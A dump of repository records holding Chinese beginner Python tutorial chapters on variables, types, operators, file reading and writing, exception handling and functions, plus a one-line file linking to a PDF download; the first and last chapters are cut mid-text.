性别:**是**男生\n- 身高:**1.75** 米\n- 体重:**75.0** 公斤\n\n> 利用 **单步调试** 确认变量中保存数据的类型\n\n**提问**\n\n1. 在演练中,一共有几种数据类型?\n\n - 4 种\n - `str` —— 字符串\n - `bool` —— 布尔(真假)\n - `int` —— 整数\n - `float` —— 浮点数(小数)\n\n2. 在\n\n \n\n ```\n Python\n ```\n\n \n\n 中定义变量时需要指定类型吗?\n\n - 不需要\n - `Python` 可以根据 `=` 等号右侧的值,自动推导出变量中存储数据的类型\n\n### 2.2 变量的类型\n\n- 在 `Python` 中定义变量是 **不需要指定类型**(在其他很多高级语言中都需要)\n\n- 数据类型可以分为 **数字型** 和 **非数字型**\n\n- 数字型\n\n - 整型 (`int`)\n\n - 浮点型(`float`)\n\n - 布尔型(\n\n ```\n bool\n ```\n\n )\n\n - 真 `True` `非 0 数` —— **非零即真**\n - 假 `False` `0`\n\n - 复数型 (\n\n ```\n complex\n ```\n\n )\n\n - 主要用于科学计算,例如:平面场问题、波动问题、电感电容等问题\n\n- 非数字型\n\n - 字符串\n - 列表\n - 元组\n - 字典\n\n> 提示:在 Python 2.x 中,**整数** 根据保存数值的长度还分为:\n>\n> - `int`(整数)\n> - `long`(长整数)\n\n- 使用 `type` 函数可以查看一个变量的类型\n\n```\nIn [1]: type(name)\n```\n\n### 2.3 不同类型变量之间的计算\n\n#### 1) **数字型变量** 之间可以直接计算\n\n- 在 Python 中,两个数字型变量是可以直接进行 算数运算的\n\n- 如果变量是\n\n \n\n ```\n bool\n ```\n\n \n\n 型,在计算时\n\n - `True` 对应的数字是 `1`\n - `False` 对应的数字是 `0`\n\n**演练步骤**\n\n1. 定义整数 `i = 10`\n2. 定义浮点数 `f = 10.5`\n3. 定义布尔型 `b = True`\n\n- 在 iPython 中,使用上述三个变量相互进行算术运算\n\n#### 2) **字符串变量** 之间使用 `+` 拼接字符串\n\n- 在 Python 中,字符串之间可以使用 `+` 拼接生成新的字符串\n\n```\nIn [1]: first_name = \"三\"\n\nIn [2]: last_name = \"张\"\n\nIn [3]: first_name + last_name\nOut[3]: '三张'\n```\n\n#### 3) **字符串变量** 可以和 **整数** 使用 `*` 重复拼接相同的字符串\n\n```\nIn [1]: \"-\" * 50\nOut[1]: '--------------------------------------------------'\n```\n\n#### 4) **数字型变量** 和 **字符串** 之间 **不能进行其他计算**\n\n```\nIn [1]: first_name = \"zhang\"\n\nIn [2]: x = 10\n\nIn [3]: x + first_name\n---------------------------------------------------------------------------\nTypeError: unsupported operand type(s) for +: 'int' and 'str'\n类型错误:`+` 不支持的操作类型:`int` 和 `str`\n```\n\n### 2.4 变量的输入\n\n- 所谓 **输入**,就是 **用代码** **获取** 用户通过 **键盘** 输入的信息\n- 例如:去银行取钱,在 ATM 上输入密码\n- 在 Python 中,如果要获取用户在 **键盘** 上的输入信息,需要使用到 `input` 函数\n\n#### 1) 关于函数\n\n- 一个 **提前准备好的功能**(别人或者自己写的代码),**可以直接使用**,而 **不用关心内部的细节**\n- 目前已经学习过的函数\n\n| 函数 | 说明 |\n| -------- | ----------------- |\n| print(x) | 将 x 输出到控制台 |\n| type(x) | 查看 x 的变量类型 |\n\n#### 2) input 函数实现键盘输入\n\n- 在 Python 中可以使用 `input` 函数从键盘等待用户的输入\n- 用户输入的 **任何内容** Python 都认为是一个 **字符串**\n- 语法如下:\n\n```\n字符串变量 = input(\"提示信息:\")\n```\n\n#### 3) 类型转换函数\n\n| 函数 | 说明 |\n| -------- | --------------------- |\n| int(x) | 将 x 转换为一个整数 |\n| float(x) | 将 x 转换到一个浮点数 |\n\n#### 4) 变量输入演练 —— 超市买苹果增强版\n\n**需求**\n\n- **收银员输入** 苹果的价格,单位:**元/斤**\n- **收银员输入** 用户购买苹果的重量,单位:**斤**\n- 计算并且 **输出** 付款金额\n\n##### 演练方式 1\n\n```\n# 1. 输入苹果单价\nprice_str = input(\"请输入苹果价格:\")\n\n# 2. 要求苹果重量\nweight_str = input(\"请输入苹果重量:\")\n\n# 3. 计算金额\n# 1> 将苹果单价转换成小数\nprice = float(price_str)\n\n# 2> 将苹果重量转换成小数\nweight = float(weight_str)\n\n# 3> 计算付款金额\nmoney = price * weight\n\nprint(money)\n```\n\n**提问**\n\n1. 演练中,针对价格 \n\n 定义了几个变量?\n\n - **两个**\n - `price_str` 记录用户输入的价格字符串\n - `price` 记录转换后的价格数值\n\n2. **思考** —— 如果开发中,需要用户通过控制台 输入 **很多个 数字**,针对每一个数字都要定义两个变量,**方便吗**?\n\n##### 演练方式 2 —— 买苹果改进版\n\n1. **定义** 一个 **浮点变量** 接收用户输入的同时,就使用 `float` 函数进行转换\n\n```\nprice = float(input(\"请输入价格:\"))\n```\n\n- 改进后的好处:\n\n1. 节约空间,只需要为一个变量分配空间\n2. 起名字方便,不需要为中间变量起名字\n\n- 改进后的“缺点”:\n\n1. 初学者需要知道,两个函数能够嵌套使用,稍微有一些难度\n\n**提示**\n\n- 如果输入的不是一个数字,程序执行时会出错,有关数据转换的高级话题,后续会讲!\n\n### 2.5 变量的格式化输出\n\n> 苹果单价 `9.00` 元/斤,购买了 `5.00` 斤,需要支付 `45.00` 元\n\n- 在 Python 中可以使用 `print` 函数将信息输出到控制台\n\n- 如果希望输出文字信息的同时,**一起输出** **数据**,就需要使用到 **格式化操作符**\n\n- ```\n %\n ```\n\n 被称为格式化操作符,专门用于处理字符串中的格式\n\n - 包含 `%` 的字符串,被称为 **格式化字符串**\n - `%` 和不同的 **字符** 连用,**不同类型的数据** 需要使用 **不同的格式化字符**\n\n| 格式化字符 | 含义 |\n| ---------- | ------------------------------------------------------------ |\n| %s | 字符串 |\n| %d | 有符号十进制整数,`%06d` 表示输出的整数显示位数,不足的地方使用 `0` 补全 |\n| %f | 浮点数,`%.2f` 表示小数点后只显示两位 |\n| %% | 输出 `%` |\n\n- 语法格式如下:\n\n```\nprint(\"格式化字符串\" % 变量1)\n\nprint(\"格式化字符串\" % (变量1, 变量2...))\n```\n\n**我们在这里将之前学到的东西再综合实战一下**\n\n下面通过几个例子来说明变量的类型和变量使用。\n\n```\n\"\"\"\n使用变量保存数据并进行加减乘除运算\n\nAuthor: 海森堡\n\"\"\"\na = 321\nb = 12\nprint(a + b) # 333\nprint(a - b) # 309\nprint(a * b) # 3852\nprint(a / b) # 26.75\n```\n\n在Python中可以使用`type`函数对变量的类型进行检查。程序设计中函数的概念跟数学上函数的概念是一致的,数学上的函数相信大家并不陌生,它包括了函数名、自变量和因变量。如果暂时不理解这个概念也不要紧,我们会在后续的章节中专门讲解函数的定义和使用。\n\n```\n\"\"\"\n使用type()检查变量的类型\n\nAuthor: 海森堡\n\"\"\"\na = 100\nb = 12.345\nc = 1 + 5j\nd = 'hello, world'\ne = True\nprint(type(a)) # <class 'int'>\nprint(type(b)) # <class 'float'>\nprint(type(c)) # <class 'complex'>\nprint(type(d)) # <class 'str'>\nprint(type(e)) # <class 'bool'>\n```\n\n可以使用Python中内置的函数对变量类型进行转换。\n\n- `int()`:将一个数值或字符串转换成整数,可以指定进制。\n- `float()`:将一个字符串转换成浮点数。\n- `str()`:将指定的对象转换成字符串形式,可以指定编码。\n- `chr()`:将整数转换成该编码对应的字符串(一个字符)。\n- `ord()`:将字符串(一个字符)转换成对应的编码(整数)。\n\n下面的代码通过键盘输入两个整数来实现对两个整数的算术运算。\n\n```\n\"\"\"\n使用input()函数获取键盘输入(字符串)\n使用int()函数将输入的字符串转换成整数\n使用print()函数输出带占位符的字符串\n\nAuthor: 海森堡\n\"\"\"\na = int(input('a = '))\nb = int(input('b = '))\nprint('%d + %d = %d' % (a, b, a + b))\nprint('%d - %d = %d' % (a, b, a - b))\nprint('%d * %d = %d' % (a, b, a * b))\nprint('%d / %d = %f' % (a, b, a / b))\nprint('%d // %d = %d' % (a, b, a // b))\nprint('%d %% %d = %d' % (a, b, a % b))\nprint('%d ** %d = %d' % (a, b, a ** b))\n```\n\n> **说明**:上面的print函数中输出的字符串使用了占位符语法,其中`%d`是整数的占位符,`%f`是小数的占位符,`%%`表示百分号(因为百分号代表了占位符,所以带占位符的字符串中要表示百分号必须写成`%%`),字符串之后的`%`后面跟的变量值会替换掉占位符然后输出到终端中,运行上面的程序,看看程序执行结果就明白啦。\n\n> 变量的命名规则\n\n> **命名规则** 可以被视为一种 **惯例**,并无绝对与强制 目的是为了 **增加代码的识别和可读性**\n\n#### 标识符和关键字\n\n> 标示符就是程序员定义的 **变量名**、**函数名**\n\n- 标示符可以由 **字母**、**下划线** 和 **数字** 组成\n- **不能以数字开头**\n- **不能与关键字重名**\n\n### 关键字\n\n- **关键字** 就是在 `Python` 内部已经使用的标识符\n- **关键字** 具有特殊的功能和含义\n- 开发者 **不允许定义和关键字相同的名字的标示符**\n\n## 变量的命名规则\n\n> **命名规则** 可以被视为一种 **惯例**,并无绝对与强制 目的是为了 **增加代码的识别和可读性**\n\n**注意** `Python` 中的 **标识符** 是 **区分大小写的**\n\n[](https://github.com/hyh1750522171/bigData/blob/master/He Yihao/python基础/images/009/002_标识符区分大小写.jpg)\n\n1. 在定义变量时,为了保证代码格式,`=` 的左右应该各保留一个空格\n\n2. Python中,如果变量名需要由 二个 或 多个单词 组成时,可以按照以下方式命名\n\n 1. 每个单词都使用小写字母\n 2. 单词与单词之间使用 **`_`下划线** 连接\n\n - 例如:`first_name`、`last_name`、`qq_number`、`qq_password`\n\n### 驼峰命名法\n\n- 当 **变量名** 是由二个或多个单词组成时,还可以利用驼峰命名法来命名\n- 小驼峰式命名法\n - 第一个单词以小写字母开始,后续单词的首字母大写\n - 例如:`firstName`、`lastName`\n- 大驼峰式命名法\n - 每一个单词的首字母都采用大写字母\n - 例如:`FirstName`、`LastName`、`CamelCase`\n\n在Python中使用变量时,需要遵守一些规则和指南。违反这些规则将引发错误,而指南旨在让你编写的代码更容易阅读和理解。请务必牢记下述有关变量的规则。 \n\n+ 变量名只能包含字母、数字和下划线。变量名可以字母或下划线打头,但不能以数字打头,例如,可将变量命名为message_1,但不能将其命名为1_message。 \n\n+ 变量名不能包含空格,但可使用下划线来分隔其中的单词。例如,变量名greeting_message可行,但变量名greetingmessage会引发错误。 \n\n+ 不要将Python关键字和函数名用作变量名,即不要使用Python保留用于特殊用途的单词,如print (请参见附录A.4)。 \n\n+ 变量名应既简短又具有描述性。例如,name比n好,student_name比s_n好,name_length比length_of_persons_name好。 \n\n+ 慎用小写字母l和大写字母O,因为它们可能被人错看成数字1和0。 \n\n要创建良好的变量名,需要经过一定的实践,在程序复杂而有趣时尤其如此。随着你编写的程序越来越多,并开始阅读别人编写的代码,将越来越善于创建有意义的变量名。\n\n### 运算符\n\nPython支持多种运算符,下表大致按照优先级从高到低的顺序列出了所有的运算符,运算符的优先级指的是多个运算符同时出现时,先做什么运算然后再做什么运算。除了我们之前已经用过的赋值运算符和算术运算符,我们稍后会陆续讲到其他运算符的使用。\n\n- 算数运算符\n- 比较(关系)运算符\n- 逻辑运算符\n- 赋值运算符\n- 运算符的优先级\n\n## 算数运算符\n\n- 是完成基本的算术运算使用的符号,用来处理四则运算\n\n| 运算符 | 描述 | 实例 |\n| ------ | ------ | ------------------------------------------ |\n| + | 加 | 10 + 20 = 30 |\n| - | 减 | 10 - 20 = -10 |\n| * | 乘 | 10 * 20 = 200 |\n| / | 除 | 10 / 20 = 0.5 |\n| // | 取整除 | 返回除法的整数部分(商) 9 // 2 输出结果 4 |\n| % | 取余数 | 返回除法的余数 9 % 2 = 1 |\n| ** | 幂 | 又称次方、乘方,2 ** 3 = 8 |\n\n- 在 Python 中 `*` 运算符还可以用于字符串,计算结果就是字符串重复指定次数的结果\n\n```\nIn [1]: \"-\" * 50\nOut[1]: '----------------------------------------' \n```\n\n## 比较(关系)运算符\n\n| 运算符 | 描述 |\n| ------ | ------------------------------------------------------------ |\n| == | 检查两个操作数的值是否 **相等**,如果是,则条件成立,返回 True |\n| != | 检查两个操作数的值是否 **不相等**,如果是,则条件成立,返回 True |\n| > | 检查左操作数的值是否 **大于** 右操作数的值,如果是,则条件成立,返回 True |\n| < | 检查左操作数的值是否 **小于** 右操作数的值,如果是,则条件成立,返回 True |\n| >= | 检查左操作数的值是否 **大于或等于** 右操作数的值,如果是,则条件成立,返回 True |\n| <= | 检查左操作数的值是否 **小于或等于** 右操作数的值,如果是,则条件成立,返回 True |\n\n> Python 2.x 中判断 **不等于** 还可以使用 `<>` 运算符\n>\n> `!=` 在 Python 2.x 中同样可以用来判断 **不等于**\n\n## 逻辑运算符\n\n| 运算符 | 逻辑表达式 | 描述 |\n| ------ | ---------- | ------------------------------------------------------------ |\n| and | x and y | 只有 x 和 y 的值都为 True,才会返回 True 否则只要 x 或者 y 有一个值为 False,就返回 False |\n| or | x or y | 只要 x 或者 y 有一个值为 True,就返回 True 只有 x 和 y 的值都为 False,才会返回 False |\n| not | not x | 如果 x 为 True,返回 False 如果 x 为 False,返回 True |\n\n## 赋值运算符\n\n- 在 Python 中,使用 `=` 可以给变量赋值\n- 在算术运算时,为了简化代码的编写,`Python` 还提供了一系列的 与 **算术运算符** 对应的 **赋值运算符**\n- 注意:**赋值运算符中间不能使用空格**\n\n| 运算符 | 描述 | 实例 |\n| ------ | -------------------------- | ------------------------------------- |\n| = | 简单的赋值运算符 | c = a + b 将 a + b 的运算结果赋值为 c |\n| += | 加法赋值运算符 | c += a 等效于 c = c + a |\n| -= | 减法赋值运算符 | c -= a 等效于 c = c - a |\n| *= | 乘法赋值运算符 | c *= a 等效于 c = c * a |\n| /= | 除法赋值运算符 | c /= a 等效于 c = c / a |\n| //= | 取整除赋值运算符 | c //= a 等效于 c = c // a |\n| %= | 取 **模** (余数)赋值运算符 | c %= a 等效于 c = c % a |\n| **= | 幂赋值运算符 | c **= a 等效于 c = c ** a |\n\n## 运算符的优先级\n\n- 以下表格的算数优先级由高到最低顺序排列\n\n| 运算符 | 描述 |\n| ------------------------ | ---------------------- |\n| ** | 幂 (最高优先级) |\n| * / % // | 乘、除、取余数、取整除 |\n| + - | 加法、减法 |\n| <= < > >= | 比较运算符 |\n| == != | 等于运算符 |\n| = %= /= //= -= += *= **= | 赋值运算符 |\n| not or and | 逻辑运算符 |\n\n\n\n### 实战\n\n\n\n```python\n\"\"\"\n比较运算符和逻辑运算符的使用\n\nAuthor: 海森堡\n\"\"\"\nflag0 = 1 == 1\nflag1 = 10 > 2\nflag2 = 20 < 1\nflag3 = flag1 and flag2\nflag4 = flag1 or flag2\nflag5 = not (1 != 2)\nprint('flag0 =', flag0) # flag0 = True\nprint('flag1 =', flag1) # flag1 = True\nprint('flag2 =', flag2) # flag2 = False\nprint('flag3 =', flag3) # flag3 = False\nprint('flag4 =', flag4) # flag4 = True\nprint('flag5 =', flag5) # flag5 = False\n```\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.699999988079071,
"alphanum_fraction": 0.824999988079071,
"avg_line_length": 77,
"blob_id": "9bcdb1f4dd552999b304e7202adfcb6fa032ed65",
"content_id": "ddbccef9cd4cd2122a30bd3fdcd2f30ab1cdbe27",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 106,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 1,
"path": "/python100题/获取python100题pdf.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "获取Python100题pdf资源:链接:https://pan.baidu.com/s/1VDNMxqxzPpMx4Y6BaaQ2vw 提取码:765y \n\n"
},
{
"alpha_fraction": 0.5614814758300781,
"alphanum_fraction": 0.588821530342102,
"avg_line_length": 15.760722160339355,
"blob_id": "d0cf8db4e2e7108c833ac8da9455c4f7d5713ec0",
"content_id": "0dfaa596f9e10551921bf5218c9a235c9716a434",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 13001,
"license_type": "permissive",
"max_line_length": 299,
"num_lines": 443,
"path": "/Python基础连载/文件和异常.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "# Python连载系列:文件和异常\n\n## 文件的概念\n\n### 文件的概念和作用\n\n- 计算机的 **文件**,就是存储在某种 **长期储存设备** 上的一段 **数据**\n- 长期存储设备包括:硬盘、U 盘、移动硬盘、光盘...\n\n**文件的作用**\n\n将数据长期保存下来,在需要的时候使用\n\n### 文件的存储方式\n\n- 在计算机中,文件是以 **二进制** 的方式保存在磁盘上的\n\n#### 文本文件和二进制文件\n\n- 文本文件\n - 可以使用 **文本编辑软件** 查看\n - 本质上还是二进制文件\n - 例如:python 的源程序\n- 二进制文件\n - 保存的内容 不是给人直接阅读的,而是 **提供给其他软件使用的**\n - 例如:图片文件、音频文件、视频文件等等\n - 二进制文件不能使用 **文本编辑软件** 查看\n\n## 文件的基本操作\n\n### 2.1 操作文件的套路\n\n在 **计算机** 中要操作文件的套路非常固定,一共包含**三个步骤**:\n\n1. 打开文件\n2. 读、写文件\n - **读** 将文件内容读入内存\n - **写** 将内存内容写入文件\n3. 关闭文件\n\n### 2.2 操作文件的函数/方法\n\n- 在 `Python` 中要操作文件需要记住 1 个函数和 3 个方法\n\n| 序号 | 函数/方法 | 说明 |\n| ---- | --------- | ------------------------------ |\n| 01 | open | 打开文件,并且返回文件操作对象 |\n| 02 | read | 将文件内容读取到内存 |\n| 03 | write | 将指定内容写入文件 |\n| 04 | close | 关闭文件 |\n\n- `open` 函数负责打开文件,并且返回文件对象\n- `read`/`write`/`close` 三个方法都需要通过 **文件对象** 来调用\n\n### 2.3 read 方法 —— 读取文件\n\n- open函数的第一个参数是要打开的文件名(文件名区分大小写)\n - 如果文件 **存在**,返回 **文件操作对象**\n - 如果文件 **不存在**,会 **抛出异常**\n- `read` 方法可以一次性 **读入** 并 **返回** 文件的 **所有内容**\n- close方法负责关闭文件\n - 如果 **忘记关闭文件**,**会造成系统资源消耗,而且会影响到后续对文件的访问**\n- **注意**:`read` 方法执行后,会把 **文件指针** 移动到 **文件的末尾**\n\n```\n# 1. 打开 - 文件名需要注意大小写\nfile = open(\"README\")\n\n# 2. 读取\ntext = file.read()\nprint(text)\n\n# 3. 关闭\nfile.close()\n```\n\n**提示**\n\n- 在开发中,通常会先编写 **打开** 和 **关闭** 的代码,再编写中间针对文件的 **读/写** 操作!\n\n#### 文件指针(知道)\n\n- **文件指针** 标记 **从哪个位置开始读取数据**\n- **第一次打开** 文件时,通常 **文件指针会指向文件的开始位置**\n- 当执行了read方法后,文件指针会移动到读取内容的末尾\n - 默认情况下会移动到 **文件末尾**\n\n**思考**\n\n- 如果执行了一次 `read` 方法,读取了所有内容,那么再次调用 `read` 方法,还能够获得到内容吗?\n\n**答案**\n\n- 不能\n- 第一次读取之后,文件指针移动到了文件末尾,再次调用不会读取到任何的内容\n\n### 打开文件的方式\n\n- `open` 函数默认以 **只读方式** 打开文件,并且返回文件对象\n\n语法如下:\n\n```\nf = open(\"文件名\", \"访问方式\")\n```\n\n| 访问方式 | 说明 |\n| -------- | ------------------------------------------------------------ |\n| r | 以**只读**方式打开文件。文件的指针将会放在文件的开头,这是**默认模式**。如果文件不存在,抛出异常 |\n| w | 以**只写**方式打开文件。如果文件存在会被覆盖。如果文件不存在,创建新文件 |\n| a | 以**追加**方式打开文件。如果该文件已存在,文件指针将会放在文件的结尾。如果文件不存在,创建新文件进行写入 |\n| r+ | 以**读写**方式打开文件。文件的指针将会放在文件的开头。如果文件不存在,抛出异常 |\n| w+ | 以**读写**方式打开文件。如果文件存在会被覆盖。如果文件不存在,创建新文件 |\n| a+ | 以**读写**方式打开文件。如果该文件已存在,文件指针将会放在文件的结尾。如果文件不存在,创建新文件进行写入 |\n\n**提示**\n\n- 频繁的移动文件指针,**会影响文件的读写效率**,开发中更多的时候会以 **只读**、**只写** 的方式来操作文件\n\n**写入文件示例**\n\n```\n# 打开文件\nf = open(\"README\", \"w\")\n\nf.write(\"hello python!\\n\")\nf.write(\"今天天气真好\")\n\n# 关闭文件\nf.close()\n```\n\n### 按行读取文件内容\n\n- `read` 方法默认会把文件的 **所有内容** **一次性读取到内存**\n- 如果文件太大,对内存的占用会非常严重\n\n#### `readline` 方法\n\n- `readline` 方法可以一次读取一行内容\n- 方法执行后,会把 **文件指针** 移动到下一行,准备再次读取\n\n**读取大文件的正确姿势**\n\n```\n# 打开文件\nfile = open(\"README\")\n\nwhile True:\n # 读取一行内容\n text = file.readline()\n\n # 判断是否读到内容\n if not text:\n break\n\n # 每读取一行的末尾已经有了一个 `\\n`\n print(text, end=\"\")\n\n# 关闭文件\nfile.close()\n```\n\n### 2.6 文件读写案例 —— 复制文件\n\n**目标**\n\n用代码的方式,来实现文件复制过程\n\n[](https://github.com/hyh1750522171/bigData/blob/master/He Yihao/python面向对象/media/15019810951755/025_复制文件.png)\n\n#### 小文件复制\n\n- 打开一个已有文件,读取完整内容,并写入到另外一个文件\n\n```\n# 1. 打开文件\nfile_read = open(\"README\")\nfile_write = open(\"README[复件]\", \"w\")\n\n# 2. 读取并写入文件\ntext = file_read.read()\nfile_write.write(text)\n\n# 3. 关闭文件\nfile_read.close()\nfile_write.close()\n```\n\n#### 大文件复制\n\n- 打开一个已有文件,逐行读取内容,并顺序写入到另外一个文件\n\n```\n# 1. 打开文件\nfile_read = open(\"README\")\nfile_write = open(\"README[复件]\", \"w\")\n\n# 2. 读取并写入文件\nwhile True:\n # 每次读取一行\n text = file_read.readline()\n\n # 判断是否读取到内容\n if not text:\n break\n\n file_write.write(text)\n\n# 3. 关闭文件\nfile_read.close()\nfile_write.close()\n```\n\n## 异常\n\n## 异常的概念\n\n- 程序在运行时,如果 `Python 解释器` **遇到** 到一个错误,**会停止程序的执行,并且提示一些错误信息**,这就是 **异常**\n- **程序停止执行并且提示错误信息** 这个动作,我们通常称之为:**抛出(raise)异常**\n\n## 捕获异常\n\n### 简单的捕获异常语法\n\n- 在程序开发中,如果 **对某些代码的执行不能确定是否正确**,可以增加 `try(尝试)` 来 **捕获异常**\n- 捕获异常最简单的语法格式:\n\n```\ntry:\n 尝试执行的代码\nexcept:\n 出现错误的处理\n```\n\n- `try` **尝试**,下方编写要尝试代码,不确定是否能够正常执行的代码\n- `except` **如果不是**,下方编写尝试失败的代码\n\n#### 简单异常捕获演练 —— 要求用户输入整数\n\n```\ntry:\n # 提示用户输入一个数字\n num = int(input(\"请输入数字:\"))\nexcept:\n print(\"请输入正确的数字\")\n```\n\n### 错误类型捕获\n\n- 在程序执行时,可能会遇到 **不同类型的异常**,并且需要 **针对不同类型的异常,做出不同的响应**,这个时候,就需要捕获错误类型了\n- 语法如下:\n\n```\ntry:\n # 尝试执行的代码\n pass\nexcept 错误类型1:\n # 针对错误类型1,对应的代码处理\n pass\nexcept (错误类型2, 错误类型3):\n # 针对错误类型2 和 3,对应的代码处理\n pass\nexcept Exception as result:\n print(\"未知错误 %s\" % result)\n```\n\n- 当 `Python` 解释器 **抛出异常** 时,**最后一行错误信息的第一个单词,就是错误类型**\n\n#### 异常类型捕获演练 —— 要求用户输入整数\n\n**需求**\n\n1. 提示用户输入一个整数\n2. 使用 `8` 除以用户输入的整数并且输出\n\n```\ntry:\n num = int(input(\"请输入整数:\"))\n result = 8 / num\n print(result)\nexcept ValueError:\n print(\"请输入正确的整数\")\nexcept ZeroDivisionError:\n print(\"除 0 错误\")\n```\n\n#### 捕获未知错误\n\n- 在开发时,**要预判到所有可能出现的错误**,还是有一定难度的\n- 如果希望程序 **无论出现任何错误**,都不会因为 `Python` 解释器 **抛出异常而被终止**,可以再增加一个 `except`\n\n语法如下:\n\n```\nexcept Exception as result:\n print(\"未知错误 %s\" % result)\n```\n\n### 异常捕获完整语法\n\n- 在实际开发中,为了能够处理复杂的异常情况,完整的异常语法如下:\n\n> 提示:\n>\n> - 有关完整语法的应用场景,在后续学习中,**结合实际的案例**会更好理解\n> - 现在先对这个语法结构有个印象即可\n\n```\ntry:\n # 尝试执行的代码\n pass\nexcept 错误类型1:\n # 针对错误类型1,对应的代码处理\n pass\nexcept 错误类型2:\n # 针对错误类型2,对应的代码处理\n pass\nexcept (错误类型3, 错误类型4):\n # 针对错误类型3 和 4,对应的代码处理\n pass\nexcept Exception as result:\n # 打印错误信息\n print(result)\nelse:\n # 没有异常才会执行的代码\n pass\nfinally:\n # 无论是否有异常,都会执行的代码\n print(\"无论是否有异常,都会执行的代码\")\n```\n\n- `else` 只有在没有异常时才会执行的代码\n- `finally` 无论是否有异常,都会执行的代码\n- 之前一个演练的 **完整捕获异常** 的代码如下:\n\n```\ntry:\n num = int(input(\"请输入整数:\"))\n result = 8 / num\n print(result)\nexcept ValueError:\n print(\"请输入正确的整数\")\nexcept ZeroDivisionError:\n print(\"除 0 错误\")\nexcept Exception as result:\n print(\"未知错误 %s\" % result)\nelse:\n print(\"正常执行\")\nfinally:\n print(\"执行完成,但是不保证正确\")\n```\n\n## 异常的传递\n\n- **异常的传递** —— 当 **函数/方法** 执行 **出现异常**,会 **将异常传递** 给 函数/方法 的 **调用一方**\n- 如果 **传递到主程序**,仍然 **没有异常处理**,程序才会被终止\n\n> 提示\n\n- 在开发中,可以在主函数中增加 **异常捕获**\n- 而在主函数中调用的其他函数,只要出现异常,都会传递到主函数的 **异常捕获** 中\n- 这样就不需要在代码中,增加大量的 **异常捕获**,能够保证代码的整洁\n\n**需求**\n\n1. 定义函数 `demo1()` **提示用户输入一个整数并且返回**\n2. 定义函数 `demo2()` 调用 `demo1()`\n3. 在主程序中调用 `demo2()`\n\n```\ndef demo1():\n return int(input(\"请输入一个整数:\"))\n\n\ndef demo2():\n return demo1()\n\ntry:\n print(demo2())\nexcept ValueError:\n print(\"请输入正确的整数\")\nexcept Exception as result:\n print(\"未知错误 %s\" % result)\n```\n\n## 抛出 `raise` 异常\n\n### 应用场景\n\n- 在开发中,除了 **代码执行出错** `Python` 解释器会 **抛出** 异常之外\n- 还可以根据 **应用程序** **特有的业务需求** **主动抛出异常**\n\n**示例**\n\n- 提示用户 **输入密码**,如果 **长度少于 8**,抛出 **异常**\n\n\n\n**注意**\n\n- 当前函数 **只负责** 提示用户输入密码,如果 **密码长度不正确,需要其他的函数进行额外处理**\n- 因此可以 **抛出异常**,由其他需要处理的函数 **捕获异常**\n\n### 抛出异常\n\n- `Python` 中提供了一个 `Exception` **异常类**\n- 在开发时,如果满足特定业务需求时,希望抛出异常,可以:\n 1. **创建** 一个 `Exception` 的 **对象**\n 2. 使用 `raise` **关键字** 抛出 **异常对象**\n\n**需求**\n\n- 定义 `input_password` 函数,提示用户输入密码\n- 如果用户输入长度 < 8,抛出异常\n- 如果用户输入长度 >=8,返回输入的密码\n\n```\ndef input_password():\n\n # 1. 提示用户输入密码\n pwd = input(\"请输入密码:\")\n\n # 2. 判断密码长度,如果长度 >= 8,返回用户输入的密码\n if len(pwd) >= 8:\n return pwd\n\n # 3. 密码长度不够,需要抛出异常\n # 1> 创建异常对象 - 使用异常的错误信息字符串作为参数\n ex = Exception(\"密码长度不够\")\n\n # 2> 抛出异常对象\n raise ex\n\n\ntry:\n user_pwd = input_password()\n print(user_pwd)\nexcept Exception as result:\n print(\"发现错误:%s\" % result)\n```\n\n\n"
},
{
"alpha_fraction": 0.6201599836349487,
"alphanum_fraction": 0.6411070227622986,
"avg_line_length": 16.582590103149414,
"blob_id": "bf8d1d2f8b1d1d6f06b4b0e7439ff5825b803286",
"content_id": "8ab689546f2b80a5ab87f824ca35ae7cd57adbfd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 14489,
"license_type": "permissive",
"max_line_length": 479,
"num_lines": 448,
"path": "/Python基础连载/函数模块.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "# Python连载系列:函数模块\n\n- 函数的快速体验\n- 定义函数 - def语句 / 函数名 / 参数列表 / return语句 / 调用自定义函数\n- 调用函数 - Python内置函数 / 导入模块和函数\n- 函数的参数 - 默认参数 / 可变参数 / 关键字参数 / 命名关键字参数\n- 函数的返回值 - 没有返回值 / 返回单个值 / 返回多个值\n- 用模块管理函数 - 模块的概念 / 用自定义模块管理函数 / 命名冲突的时候会怎样(同一个模块和不同的模块)\n\n## 函数的快速体验\n\n### 快速体验\n\n- 所谓**函数**,就是把 **具有独立功能的代码块** 组织为一个小模块,在需要的时候 **调用**\n- 函数的使用包含两个步骤:\n 1. 定义函数 —— **封装** 独立的功能\n 2. 调用函数 —— 享受 **封装** 的成果\n- **函数的作用**,在开发程序时,使用函数可以提高编写的效率以及代码的 **重用**\n\n**演练步骤**\n\n1. 新建 `04_函数` 项目\n2. 复制之前完成的 **乘法表** 文件\n3. 修改文件,增加函数定义 `multiple_table():`\n4. 新建另外一个文件,使用 `import` 导入并且调用函数\n\n## 函数基本使用\n\n### 函数的定义\n\n定义函数的格式如下:\n\n```\ndef 函数名():\n\n 函数封装的代码\n ……\n```\n\n1. `def` 是英文 `define` 的缩写\n2. **函数名称** 应该能够表达 **函数封装代码** 的功能,方便后续的调用\n3. **函数名称** 的命名应该 **符合** **标识符的命名规则**\n - 可以由 **字母**、**下划线** 和 **数字** 组成\n - **不能以数字开头**\n - **不能与关键字重名**\n\n### 函数调用\n\n调用函数很简单的,通过 `函数名()` 即可完成对函数的调用\n\n### 第一个函数演练\n\n**需求**\n\n- 1. 编写一个打招呼 `say_hello` 的函数,封装三行打招呼的代码\n- 1. 在函数下方调用打招呼的代码\n\n```\nname = \"小明\"\n\n\n# 解释器知道这里定义了一个函数\ndef say_hello():\n print(\"hello 1\")\n print(\"hello 2\")\n print(\"hello 3\")\n\nprint(name)\n# 只有在调用函数时,之前定义的函数才会被执行\n# 